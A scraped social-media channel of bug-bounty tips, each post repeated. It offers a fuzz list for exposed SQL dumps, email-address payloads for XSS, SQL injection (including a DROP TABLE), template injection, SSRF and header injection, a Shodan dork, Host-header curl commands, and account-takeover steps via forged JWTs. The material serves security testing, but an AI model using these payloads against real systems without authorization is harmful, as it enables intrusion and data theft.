#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
🔺Template injection:
🔺SQL injection:
🔺SSRF (Server-Side Request Forgery):
🔺Parameter pollution:
🔺(Email) header injection:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
inurl:"Target Name" employee offers2-Found website which provides offers to the Target.
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
#Bug_Bounty_Tips_17
🛡BugBounty_Tips
Here’s an example of exposed RocketMQ
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
this time to pull up RocketMQ console which often has quite confidential production information disclosed(Shodan Dorks):
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc
🛡BugBounty_Tips
Here’s an example of exposed RocketMQ
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
this time to pull up RocketMQ console which often has quite confidential production information disclosed(Shodan Dorks):
org:target.com http.title:rocketmq-consoleFrom the exposed RocketMQ consoles we can for example find out:
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc
#Bug_Bounty_Tips_18
🛡BugBounty_Tips
🌀Want to find critical bugs by changing a single header?set the ‘Host’ header to ‘localhost’ in your next directory bruteforce, the results might be surprising! You might gain access to:
1️⃣Special features
2️⃣Internal endpoints
3️⃣Config files, SSL keys
4️⃣Directory listing, …
We can even take this a step further and try to identify all sites that are hosted on the target web server by performing virtual host enumeration. How to enumerate virtual hosts? We could use tools such as these:
ffuf
https-vhosts
virtual-host-discovery
Note that we could also use curl or wget:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Want to find critical bugs by changing a single header?set the ‘Host’ header to ‘localhost’ in your next directory bruteforce, the results might be surprising! You might gain access to:
1️⃣Special features
2️⃣Internal endpoints
3️⃣Config files, SSL keys
4️⃣Directory listing, …
We can even take this a step further and try to identify all sites that are hosted on the target web server by performing virtual host enumeration. How to enumerate virtual hosts? We could use tools such as these:
ffuf
https-vhosts
virtual-host-discovery
Note that we could also use curl or wget:
curl -v -H "Host: localhost" https://target/
wget -d --header="Host: localhost" https://target/
☣️@InfoSecTube
👍1
#Bug_Bounty_Tips_19
🛡BugBounty_Tips
🌀Javascript polyglot for XSS
🛡BugBounty_Tips
🌀Javascript polyglot for XSS
Note that we may only need a certain portion of the polyglot, depending on our situation. Do not copy & paste blindly.
☣️
@InfoSecTube#Bug_Bounty_Tips_20
🛡BugBounty_Tips
🌀Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash?
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. Grab the tool from here:
☢️favihash
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash?
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. Grab the tool from here:
☢️favihash
☣️@InfoSecTube
#Bug_Bounty_Tips_21
🛡BugBounty_Tips
🌀 Account takeover by JWT token forging
Methodolgy:
✅Decompiled APK and found API endpoint
>> /signup/users/generateJwtToken
✅Sent to repeater (Burp Suite)
✅Added Auth-Token header in the request
✅Used my account’s auth token in the header
✅Removed the signature part –> It works !!
✅Changed user id in token using JOSEPH in Burp Suite
✅Got other user’s JWT token in the response
✅Account takeover!
Note that all other endpoints were properly checking the JWK token.
🔰JOSEPH
☣️@InfoSecTube
🛡BugBounty_Tips
🌀 Account takeover by JWT token forging
Methodolgy:
✅Decompiled APK and found API endpoint
>> /signup/users/generateJwtToken
✅Sent to repeater (Burp Suite)
✅Added Auth-Token header in the request
✅Used my account’s auth token in the header
✅Removed the signature part –> It works !!
✅Changed user id in token using JOSEPH in Burp Suite
✅Got other user’s JWT token in the response
✅Account takeover!
Note that all other endpoints were properly checking the JWK token.
🔰JOSEPH
☣️@InfoSecTube